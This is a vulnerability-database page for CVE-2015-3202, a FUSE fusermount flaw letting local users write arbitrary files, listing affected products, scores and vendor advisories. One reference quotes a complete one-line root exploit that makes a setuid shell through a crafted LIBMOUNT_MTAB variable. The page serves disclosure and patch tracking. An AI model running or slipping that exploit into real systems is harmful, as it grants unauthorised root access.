Vulnerability Details : CVE-2015-3202
fusermount in FUSE before 2.9.3-15 does not properly clear the environment before invoking (1) mount or (2) umount as root, which allows local users to write to arbitrary files via a crafted LIBMOUNT_MTAB environment variable that is used by mount's debugging feature.
Products affected by CVE-2015-3202
- cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
- cpe:2.3:a:fuse_project:fuse:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2015-3202
0.04%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2015-3202
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
3.6
|
LOW | AV:L/AC:L/Au:N/C:N/I:P/A:P |
3.9
|
4.9
|
NIST |
CWE ids for CVE-2015-3202
-
Assigned by: nvd@nist.gov (Primary)
References for CVE-2015-3202
-
https://twitter.com/taviso/status/601370527437967360
Tavis Ormandy on Twitter: "a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202"
-
https://security.gentoo.org/glsa/201701-19
NTFS-3G: Privilege escalation (GLSA 201701-19) โ Gentoo security
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159543.html
[SECURITY] Fedora 21 Update: ntfs-3g-2015.3.14-2.fc21
-
http://www.securityfocus.com/bid/74765
FUSE CVE-2015-3202 Local Privilege Escalation Vulnerability
-
http://www.debian.org/security/2015/dsa-3266
Debian -- Security Information -- DSA-3266-1 fuse
-
http://lists.opensuse.org/opensuse-updates/2015-06/msg00007.html
openSUSE-SU-2015:1003-1: moderate: Security update for fuse
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160094.html
[SECURITY] Fedora 20 Update: fuse-2.9.4-1.fc20
-
https://security.gentoo.org/glsa/201603-04
FUSE: incorrect filtering of environment variables leading to privilege escalation (GLSA 201603-04) โ Gentoo security
-
http://lists.opensuse.org/opensuse-updates/2015-06/msg00005.html
openSUSE-SU-2015:0997-1: moderate: Security update for fuse
-
http://www.ubuntu.com/usn/USN-2617-3
USN-2617-3: NTFS-3G vulnerability | Ubuntu security notices
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159683.html
[SECURITY] Fedora 22 Update: fuse-2.9.4-1.fc22
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159831.html
[SECURITY] Fedora 21 Update: fuse-2.9.4-1.fc21
-
http://www.securitytracker.com/id/1032386
Filesystem in Userspace (FUSE) LIBMOUNT_MTAB Environment Variable Sanitization Flaw Lets Local Users Gain Elevated Privileges - SecurityTracker
-
http://www.openwall.com/lists/oss-security/2015/05/21/9
oss-security - CVE-2015-3202 fuse privilege escalationExploit
-
https://gist.github.com/taviso/ecb70eb12d461dd85cba
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. ยท GitHubExploit
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160106.html
[SECURITY] Fedora 20 Update: ntfs-3g-2015.3.14-2.fc20
-
http://www.ubuntu.com/usn/USN-2617-2
USN-2617-2: NTFS-3G vulnerability | Ubuntu security notices
-
https://www.exploit-db.com/exploits/37089/
Fuse 2.9.3-15 - Local Privilege Escalation
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159298.html
[SECURITY] Fedora 22 Update: ntfs-3g-2015.3.14-2.fc22
-
http://packetstormsecurity.com/files/132021/Fuse-Local-Privilege-Escalation.html
Fuse Local Privilege Escalation โ Packet Storm
-
http://www.ubuntu.com/usn/USN-2617-1
USN-2617-1: FUSE vulnerability | Ubuntu security notices
-
http://www.debian.org/security/2015/dsa-3268
Debian -- Security Information -- DSA-3268-1 ntfs-3g
Jump to